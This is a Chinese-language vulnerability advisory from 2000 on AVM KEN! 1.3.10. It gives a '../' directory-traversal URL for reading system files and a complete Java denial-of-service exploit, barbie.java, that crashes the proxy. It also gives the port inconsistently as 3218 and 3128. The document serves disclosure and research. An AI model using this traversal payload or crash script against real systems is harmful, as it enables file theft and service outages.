AVM KEN! 1.3.10可能泄漏系统文件
发布日期:2000-04-14
更新日期:2000-04-14
受影响系统:
AVM KEN! 1.3.10
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
描述:
远程用户可以浏览正在运行AVM KEN!的远程主机上的任意已知文件。攻击者只要向3218端口
发送包含有"../"字符的URL,就可以绕过web文件结构的限制获取系统文件。例如:
http://target:3128/../../../filename.ext
另外,通过向3218端口发送随机字符,可以导致对AVM KEN!的拒绝服务攻击。要想恢复正常
工作,必须重新启动服务。
<* 来源:eAX <eax@mad.scientist.com> *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
-----8<-----------8<------barbie.java -----8<-----------8<-----------
import java.net.Socket;
import java.io.*;
/*
BARBIE - The AVM KEN! exploit
This exploit causes a crash in the AVM KEN! ISDN Proxy software.
All conections will be cut off, but the server will restart again,
a few seconds later.
Tested with AVM KEN! Version 1.03.10 (german)
*/
class barbie {
String adress;
public void killken() {
PrintWriter out = null;
try{
Socket connection = new Socket( adress, 3128);
System.out.println("");
System.out.println("killing...");
out = new PrintWriter(connection.getOutputStream(), true);
out.println("Whooopppss_Ken_died");
connection.close();
}
catch (IOException e)
{
System.out.println("");
System.out.println(" Can't met Ken! ");
}
}
public static void main (String arguments[]) {
barbie kk = new barbie();
if(arguments.length < 1)
{
System.out.println("");
System.out.println("usage: java barbie <adress/ip>");
System.exit(1);
}
kk.adress = arguments[0];
kk.killken();
}
}
----->8----------->8------ end ----->8----------->8-----------
建议:
暂无
浏览次数:6523
严重程度:0(网友投票)